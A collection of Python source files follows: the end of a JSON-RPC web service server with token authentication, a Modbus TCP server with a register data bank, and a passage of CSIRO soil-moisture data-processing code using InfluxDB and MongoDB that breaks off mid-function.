call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_GenericsService.fetch_data,
name='GenericsService.fetch_data',
types=[dict])
self.method_authentication['GenericsService.fetch_data'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.count_attribute_value,
name='GenericsService.count_attribute_value',
types=[dict])
self.method_authentication['GenericsService.count_attribute_value'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.select_col_ids,
name='GenericsService.select_col_ids',
types=[dict])
self.method_authentication['GenericsService.select_col_ids'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.select_row_ids,
name='GenericsService.select_row_ids',
types=[dict])
self.method_authentication['GenericsService.select_row_ids'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.fetch_attributes,
name='GenericsService.fetch_attributes',
types=[dict])
self.method_authentication['GenericsService.fetch_attributes'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.fetch_data_by_ids,
name='GenericsService.fetch_data_by_ids',
types=[dict])
self.method_authentication['GenericsService.fetch_data_by_ids'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.fetch_all,
name='GenericsService.fetch_all',
types=[dict])
self.method_authentication['GenericsService.fetch_all'] = 'required' # noqa
self.rpc_service.add(impl_GenericsService.status,
name='GenericsService.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'GenericsService ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
server.py
|
import constants as const
import utils as mu
import socket
import struct
import settings
from threading import Lock, Thread
# for python2 compatibility
try:
from socketserver import BaseRequestHandler, ThreadingTCPServer
except ImportError:
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class DataBank:
""" Data class for thread safe access to bits and words space
words space is always kept in bytes the reason for this every
vendor of PLC or other hardware store the data inconsistently
so a 16 bit register could have two 8bit ascii characters with
10 registers strung to together to hold 20 char string then the
next register holding 16 bit float type the next register two
registers holder 32 bit integer. There is no way to tell what data
type is being sent so the code was refactored to
stop unpacking/converting from byte stream to integer.
Several classmethods have been added to convert bytes to
a respective python data type but you need to know the data type
being stored in the register.
Need to write several more access and write methods to deal with
signed integer, float and double types"""
bits_lock = Lock()
bits = [False] * 0x10000
words_lock = Lock()
words = [struct.pack('>H', 0)] * 0x10000
@classmethod
def clear_registers(cls):
with cls.words_lock:
cls.word = [struct.pack('>H', 0)] * 0x10000
with cls.bits_lock:
cls.bits = [False] * 0x10000
return True
@classmethod
def get_ascii(cls, pstart, pend):
with cls.words_lock:
if (pstart>=0 and pend<=65535) and (pend >=pstart):
_ascii = b''.join(cls.words[pstart:pend]).decode('ascii')
##print(_ascii)
return _ascii
else:
return None
@classmethod
def get_bits(cls, address, number=1):
with cls.bits_lock:
if (address >= 0) and (address + number <= len(cls.bits)):
return cls.bits[address: number + address]
else:
return None
@classmethod
def get_double(cls, pstart, pend):
with cls.words_lock:
if (pstart>=0 and pend<=65535) and (pstart+3 == pend):
return struct.unpack('>d',cls.words[pstart:pend])[0]
else:
return None
@classmethod
def get_int2(cls, address):
with cls.words_lock:
if (address>=0 and address<=65535):
return struct.unpack('>H',cls.words[address])[0]
else:
return None
@classmethod
def get_int4(cls, pstart ):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535):
return struct.unpack('>I',cls.words[pstart:pstart+1])[0]
else:
return None
@classmethod
def get_float4(cls, pstart):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535):
return struct.unpack('>f',cls.words[pstart:pstart+1])[0]
else:
return None
@classmethod
def get_words(cls, address, number=1):
with cls.words_lock:
if (address >= 0) and (address + number <= len(cls.words)):
return cls.words[address: number + address]
else:
return None
@classmethod
def set_ascii(cls, pstart, pend, pvalue):
if (pstart>=0 and pend<=65535) and ( (pend-pstart) >= (len(pvalue)/2) ):
_c_char = mu.ascii_to_char_bit(pvalue)
if len(_c_char)> (pend-pstart):
return False
_i = pstart
with cls.words_lock:
for _char in _c_char:
cls.words[_i]= _char
_i = _i+1
return True
return False
@classmethod
def set_bits(cls, address, bit_list):
with cls.bits_lock:
if (address >= 0) and (address + len(bit_list) <= len(cls.bits)):
cls.bits[address: address + len(bit_list)] = bit_list
if settings.SERVER_PRINT_REGISTER_CHANGES:
print("Coil Address from %s to %s, boolean values: %s"
% (address, len(bit_list)-1,
', '.join([str(i) for i in bit_list])
)
)
return True
else:
return False
@classmethod
def set_clear_words(cls, pstart, pend):
with cls.words_lock:
if (pstart>=0 and pend<=65535) and (pstart <= pend):
i = pstart
while i <= pend :
cls.words[i] = 0
i = i + 1
return True
else:
return False
@classmethod
def set_int2(cls, address, pvalue):
with cls.words_lock:
if (address>=0 and address<=65535 and pvalue <= 65535):
cls.words[address] = struct.pack('>H', pvalue)
return True
else:
return False
@classmethod
def set_int4(cls, pstart, pvalue):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535) and (pvalue <= 4294967295):
cls.words[pstart:pstart+1] = struct.pack('>I', pvalue )
return True
else:
return False
@classmethod
def set_float4(cls, pstart, pvalue):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535) and isinstance(pvalue, float):
cls.words[pstart:pstart+1] = struct.pack('>f',pvalue)
return True
else:
return False
@classmethod
def set_words(cls, address, word_list):
with cls.words_lock:
#if (address >= 0) and (address + len(word_list) <= len(cls.words)):
if (address>=0 and address<=65535):
#ddcls.words[address: address + len(word_list)] = word_list
cls.words[address]=word_list
if settings.SERVER_PRINT_REGISTER_CHANGES:
print(word_list)
try:
print("Address: %s value: %s" % (address, (b''.join(word_list)).decode('ascii')))
except :
print("Address: %s value: %s" % (address, struct.unpack('>H', word_list)))
return True
else:
return False
class ModbusServer(object):
"""Modbus TCP server"""
class ModbusService(BaseRequestHandler):
bytes_to_read = 2
def recv_all(self, size):
if hasattr(socket, "MSG_WAITALL"):
data = self.request.recv(size, socket.MSG_WAITALL)
else:
# Windows lacks MSG_WAITALL
data = b''
while len(data) < size:
data += self.request.recv(size - len(data))
return data
def handle(self):
while True:
rx_head = self.recv_all(7)
# close connection if no standard 7 bytes header
if not (rx_head and len(rx_head) == 7):
break
# decode header
(rx_hd_tr_id, rx_hd_pr_id,
rx_hd_length, rx_hd_unit_id) = struct.unpack('>HHHB', rx_head)
# close connection if frame header content inconsistency
if not ((rx_hd_pr_id == 0) and (2 < rx_hd_length < 256)):
break
# receive body
rx_body = self.recv_all(rx_hd_length - 1)
# close connection if lack of bytes in frame body
if not (rx_body and (len(rx_body) == rx_hd_length - 1)):
break
# body decode: function code
rx_bd_fc = struct.unpack('B', rx_body[0:1])[0]
# close connection if function code is inconsistent
if rx_bd_fc > 0x7F:
break
# default except status
exp_status = const.EXP_NONE
# functions Read Coils (0x01) or Read Discrete Inputs (0x02)
if rx_bd_fc in (const.READ_COILS, const.READ_DISCRETE_INPUTS):
(b_address, b_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested bits
if 0x0001 <= b_count <= 0x07D0:
bits_l = DataBank.get_bits(b_address, b_count)
if bits_l:
# allocate bytes list
b_size = int(b_count / 8)
b_size += 1 if (b_count % 8) else 0
bytes_l = [0] * b_size
# populate bytes list with data bank bits
for i, item in enumerate(bits_l):
if item:
byte_i = int(i/8)
bytes_l[byte_i] = mu.set_bit(bytes_l[byte_i], i % 8)
# format body of frame with bits
tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
# add bytes with bits
for byte in bytes_l:
tx_body += struct.pack('B', byte)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# functions Read Holding Registers (0x03) or Read Input Registers (0x04)
elif rx_bd_fc in (const.READ_HOLDING_REGISTERS, const.READ_INPUT_REGISTERS):
(w_address, w_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested words
if 0x0001 <= w_count <= 0x007D:
words_l = DataBank.get_words(w_address, w_count)
if words_l:
# format body of frame with words
tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
for word in words_l:
tx_body += word
#tx_body += struct.pack('>H', word)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Single Coil (0x05)
elif rx_bd_fc is const.WRITE_SINGLE_COIL:
(b_address, b_value) = struct.unpack('>HH', rx_body[1:])
f_b_value = bool(b_value == 0xFF00)
if DataBank.set_bits(b_address, [f_b_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Single Register (0x06)
elif rx_bd_fc is const.WRITE_SINGLE_REGISTER:
(w_address, w_value) = struct.unpack('>HH', rx_body[1:])
#w_address = struct.unpack('>H', rx_body[1:3])
#w_value =
print(rx_body[3:5])
if DataBank.set_words(w_address, rx_body[3:5]):
# send write ok frame
#tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_value)
tx_body = struct.pack('>BH', rx_bd_fc, w_address ) + rx_body[3:5]
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Multiple Coils (0x0F)
elif rx_bd_fc is const.WRITE_MULTIPLE_COILS:
(b_address, b_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated coils
if (0x0001 <= b_count <= 0x07B0) and (byte_count >= (b_count/8)):
# allocate bits list
bits_l = [False] * b_count
# populate bits list with bits from rx frame
for i, item in enumerate(bits_l):
b_bit_pos = int(i/8)+6
b_bit_val = struct.unpack('B', rx_body[b_bit_pos:b_bit_pos+1])[0]
bits_l[i] = mu.test_bit(b_bit_val, i % 8)
# write words to data bank
if DataBank.set_bits(b_address, bits_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Multiple Registers (0x10)
elif rx_bd_fc is const.WRITE_MULTIPLE_REGISTERS:
(w_address, w_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated words
if (0x0001 <= w_count <= 0x007B) and (byte_count == w_count * 2):
# allocate words list
words_l = [0] * w_count
# populate words list with words from rx frame
for i, item in enumerate(words_l):
w_offset = i * 2 + 6
# words_l[i] = struct.unpack('>H', rx_body[w_offset:w_offset + 2])[0]
# write words to data bank
print(w_address)
print(rx_body[w_offset:w_offset + self.bytes_to_read])
if DataBank.set_words(w_address+i, rx_body[w_offset:w_offset + self.bytes_to_read]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
else:
exp_status = const.EXP_ILLEGAL_FUNCTION
# check exception
if exp_status != const.EXP_NONE:
# format body of frame with exception status
tx_body = struct.pack('BB', rx_bd_fc + 0x80, exp_status)
# build frame header
tx_head = struct.pack('>HHHB', rx_hd_tr_id, rx_hd_pr_id, len(tx_body) + 1, rx_hd_unit_id)
# send frame
self.request.send(tx_head + tx_body)
self.request.close()
def __init__(self, host='localhost', port=const.MODBUS_PORT, no_block=False, ipv6=False, register_width=16):
"""Constructor
Modbus server constructor.
:param host: hostname or IPv4/IPv6 address server address (optional)
:type host: str
:param port: TCP port number (optional)
:type port: int
:param no_block: set no block mode, in this mode start() return (optional)
:type no_block: bool
:param ipv6: use ipv6 stack
:type ipv6: bool
:param register_width: how many bits the server expects for each word sent default 16 or 32 bit
:type register_width: integer
"""
# public
self.host = host
self.port = port
self.no_block = no_block
self.ipv6 = ipv6
self.register_width = register_width
# private
self._running = False
self._service = None
self._serve_th = None
def start(self):
"""Start the server.
Do nothing if server is already running.
This function will block if no_block is not set to True.
"""
if not self.is_run:
# set class attribute
ThreadingTCPServer.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
ThreadingTCPServer.daemon_threads = True
# init server
self._service = ThreadingTCPServer((self.host, self.port), self.ModbusService, bind_and_activate=False)
# set socket options
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# TODO test no_delay with bench
self._service.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# bind and activate
self._service.server_bind()
self._service.server_activate()
# serve request
if self.no_block:
self._serve_th = Thread(target=self._serve)
self._serve_th.daemon = True
self._serve_th.start()
else:
self._serve()
def stop(self):
"""Stop the server.
Do nothing if server is already not running.
"""
if self.is_run:
self._service.shutdown()
self._service.server_close()
@property
def is_run(self):
"""Return True if server running.
"""
return self._running
def _serve(self):
try:
self._running = True
self._service.serve_forever()
except:
self._service.server_close()
raise
finally:
self._running = False
|
cosmoz_process_levels.py
|
#!/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright 2019 CSIRO Land and Water
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import sys
from multiprocessing import Process, Pool, Queue
import math
from datetime import time as d_time, datetime, timedelta, timezone
from influxdb import InfluxDBClient
from pymongo import MongoClient
from sortedcontainers import SortedList
from .influx_cached_writer import AccumCacheInfluxWriter
from .utils import datetime_to_isostring, isostring_to_datetime
from ._influx_db_config import config as influx_config
from ._mongo_db_config import config as mongodb_config
influx_client = InfluxDBClient(
influx_config['DB_HOST'], int(influx_config['DB_PORT']),
influx_config['DB_USERNAME'], influx_config['DB_PASSWORD'],
influx_config['DB_NAME'], timeout=30)
THIRTY_YEARS = timedelta(days=365 * 30)
TEN_YEARS = timedelta(days=365 * 10)
ONE_YEAR = timedelta(days=365)
def level3_to_level4(site_no=1, start_time=None, backprocess=None, drop_old=False):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
result = influx_client.query("""\
SELECT "time", site_no, soil_moist, effective_depth, rainfall
--FROM "level3_temp"
FROM "level3"
WHERE "time" > '{}' AND flag='0' AND site_no='{}'""".format(time_string, site_no))
points = result.get_points()
if drop_old:
influx_client.query(
"DROP SERIES FROM level4 WHERE site_no='{}';".format(site_no),
method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
for p in points:
this_datetime = isostring_to_datetime(p['time'])
three_h_ago = datetime_to_isostring(this_datetime - timedelta(hours=3, seconds=1))
three_h_fwd = datetime_to_isostring(this_datetime + timedelta(hours=3, seconds=1))
r2 = influx_client.query("""\
SELECT MEAN("soil_moist") as soil_moist_filtered, MEAN("effective_depth") as depth_filtered
FROM (SELECT soil_moist, effective_depth FROM "level3"
WHERE "time" >= '{}' AND "time" <= '{}' AND flag='0' AND site_no='{}'
LIMIT 7)""".format(three_h_ago, three_h_fwd, site_no))
p2 = r2.get_points()
try:
avgs = next(p2)
soil_moist_filtered = avgs['soil_moist_filtered']
depth_filtered = avgs['depth_filtered']
except (StopIteration, KeyError):
soil_moist_filtered = p['soil_moist']
depth_filtered = p['effective_depth']
json_body = {
"measurement": "level4",
#"measurement": "level4_temp",
"tags": {
"site_no": p['site_no'],
},
"time": p['time'],
"fields": {
"soil_moist": float(p['soil_moist']),
"effective_depth": float(p['effective_depth']),
"rainfall": float(p['rainfall']),
"soil_moist_filtered": soil_moist_filtered,
"depth_filtered": depth_filtered
}
}
writer.write_point(json_body)
def level2_to_level3(mongo_client, site_no=1, start_time=None, backprocess=None, drop_old=False):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
all_stations = mdb.all_stations
this_site = all_stations.find_one({'site_no': site_no})
try:
alternate_algorithm = this_site["alternate_algorithm"]
except LookupError:
alternate_algorithm = None
sandy_a = 1216036430.0
sandy_b = -3.272
result = influx_client.query("""\
SELECT "time", site_no, wv_corr, corr_count, rain, flag as level2_flag
--SELECT "time", site_no, wv_corr, corr_count, flag as level2_flag
--FROM "level2_temp"
FROM "level2"
WHERE "time" > '{}' AND site_no='{}'""".format(time_string, site_no))
points = result.get_points()
if drop_old:
influx_client.query("DROP SERIES FROM level3 WHERE site_no='{}';".format(site_no), method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
for p in points:
wv_corr = float(p['wv_corr'])
corr_count = float(p['corr_count'])
n0_cal = float(this_site['n0_cal'].to_decimal())
bulk_density = float(this_site['bulk_density'].to_decimal())
lattice_water_g_g = this_site['lattice_water_g_g'].to_decimal()
soil_organic_matter_g_g = this_site['soil_organic_matter_g_g'].to_decimal()
lattice_soil_organic_sum = float(lattice_water_g_g + soil_organic_matter_g_g)
if alternate_algorithm and alternate_algorithm == "sandy":
if wv_corr == 1.0:
flag = 5
elif corr_count > (3.0 * n0_cal):
flag = 3
elif corr_count < (0.5 * n0_cal):
flag = 2
else:
flag = int(p['level2_flag'])
corrected_moist_val = sandy_a * (corr_count ** sandy_b)
else:
if wv_corr == 1.0:
flag = 5
elif corr_count > n0_cal:
flag = 3
elif corr_count < (0.4 * n0_cal):
flag = 2
else:
flag = int(p['level2_flag'])
corrected_moist_val = (0.0808 / ((corr_count / n0_cal) - 0.372) - 0.115 - lattice_soil_organic_sum) * bulk_density
#((0.0808 / ((l2.CorrCount / a.N0_Cal) - 0.372) - 0.115 - a.LatticeWater_g_g - a.SoilOrganicMatter_g_g) * a.BulkDensity) * 100
soil_moisture = corrected_moist_val * 100.0
#5.8 / ( ((a.LatticeWater_g_g + a.SoilOrganicMatter_g_g) * a.BulkDensity) + ( (0.0808 / ( (l2.CorrCount / a.N0_Cal) - 0.372) - 0.115 - a.LatticeWater_g_g - a.SoilOrganicMatter_g_g) * a.BulkDensity ) + 0.0829) AS EffectiveDepth,
effective_depth = 5.8 / ((lattice_soil_organic_sum * bulk_density) + corrected_moist_val + 0.0829)
json_body = {
"measurement": "level3",
#"measurement": "level3_temp",
"tags": {
"site_no": p['site_no'],
"flag": flag,
},
"time": p['time'],
"fields": {
"soil_moist": soil_moisture,
"effective_depth": effective_depth,
"rainfall": float(p['rain']) * 0.2
}
}
writer.write_point(json_body)
def level1_to_level2(mongo_client, site_no=1, start_time=None, backprocess=None, drop_old=False):
emulate_old_version = False
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
all_stations_collection = mdb.all_stations
this_site = all_stations_collection.find_one({'site_no': site_no})
result = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, pressure2, external_temperature, external_humidity, rain, flag as level1_flag
FROM "level1"
WHERE "time" > '{}' AND site_no=$s""".format(time_string), bind_params={"s": str(site_no)})
points = result.get_points()
if drop_old:
influx_client.query("DROP SERIES FROM level2 WHERE site_no=$s;", bind_params={"s": str(site_no)}, method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
for p in points:
count = p['count']
pressure1 = float(p['pressure1'])
pressure2 = float(p['pressure2'])
if pressure2 != 0:
press_corr = math.exp(float(this_site['beta'].to_decimal()) * (pressure2 - float(this_site['ref_pressure'].to_decimal())))
elif pressure1 != 0:
press_corr = math.exp(float(this_site['beta'].to_decimal()) * (pressure1 - float(this_site['ref_pressure'].to_decimal())))
else:
press_corr = 1.0
this_datetime = isostring_to_datetime(p['time'])
this_day_start = datetime_to_isostring(this_datetime.date())
this_day_end = datetime_to_isostring(datetime.combine(this_datetime.date(), d_time(11, 59, 59, 999999, tzinfo=this_datetime.tzinfo)))
this_hour_start = datetime_to_isostring(datetime.combine(this_datetime.date(), d_time(this_datetime.hour, 0, 0, 0, tzinfo=this_datetime.tzinfo)))
this_hour_end = datetime_to_isostring(datetime.combine(this_datetime.date(), d_time(this_datetime.hour, 59, 59, 999999, tzinfo=this_datetime.tzinfo)))
external_temperature = float(p['external_temperature'])
external_humidity = float(p['external_humidity'])
# if external temperature or external humidity is zero, we will need to get the data from SILO.
if external_temperature == 0 or external_humidity == 0:
silo_req = influx_client.query("""SELECT LAST(*) FROM "silo_data" WHERE "time" >= '{}' AND "time" <= '{}' AND site_no='{}'""".format(this_day_start, this_day_end, site_no))
try:
sp = next(silo_req.get_points())
average_temperature = float(sp['last_average_temperature'])
average_humidity = float(sp['last_average_humidity'])
except (StopIteration, ValueError, KeyError):
average_temperature = None
average_humidity = None
else:
average_temperature = None
average_humidity = None
if external_temperature != 0 and external_humidity != 0:
# IF ExternalTemperature AND ExternalHumidity (from the Level1View View) has valid data. Use them in the WVCorr equation
wv_corr_store = 1+0.0054*((2165*((0.6108*math.exp((17.27*external_temperature)/(external_temperature+237.3)))*(external_humidity/100.0)))/(external_temperature+273.16)-0)
wv_corr_use = wv_corr_store
elif average_humidity is not None:
# Otherwise, IF AverageTemperature AND AverageHumidity (from the SiloData table) has valid data. Use them in the WVCorr equation.
use_temp = average_temperature if average_temperature is not None else 0.0
wv_corr_use = 1+0.0054*((2165*((0.6108*math.exp((17.27*use_temp)/(use_temp+237.3)))*(average_humidity/100.0)))/(use_temp+273.16)-0)
if emulate_old_version:
if average_temperature is not None:
wv_corr_store = wv_corr_use
else:
wv_corr_store = 1.0
else:
wv_corr_store = wv_corr_use
else:
# Finally, use either external OR average values, or zero
use_humidity = average_humidity if external_humidity == 0 else external_humidity
use_temp = average_temperature if external_temperature == 0 else external_temperature
if use_humidity is None or use_humidity == 0:
wv_corr_use = 1.0
else:
if use_temp is None:
use_temp = 0.0 # Use the actual zero temp in the calculation
wv_corr_use = 1+0.0054*((2165*((0.6108*math.exp((17.27*use_temp)/(use_temp+237.3)))*(use_humidity/100.0)))/(use_temp+273.16)-0)
if emulate_old_version:
wv_corr_store = 1.0 # Store this, to match the old way the system stored wv_corr
else:
wv_corr_store = wv_corr_use
# IF we can match the record's timestamp (to the hour) to one in the Intensity table. Use the Intensity value in the IntensityCorr equation.
intensity_req = influx_client.query("""SELECT * FROM "intensity" WHERE "time" >= '{}' AND "time" <= '{}' AND site_no='{}'""".format(this_hour_start, this_hour_end, site_no))
try:
intensities = list(intensity_req.get_points())
assert len(intensities) > 0
if len(intensities) > 1:
print("Found too many intensity records in a single hour period.")
intensity_p = intensities[0]
#int_key = "intensity"
except (StopIteration, AssertionError):
# no intensity to the nearest hour
# Otherwise, IF we can find the last valid timestamp for this record. Use the Intensity value in the IntensityCorr equation.
if emulate_old_version:
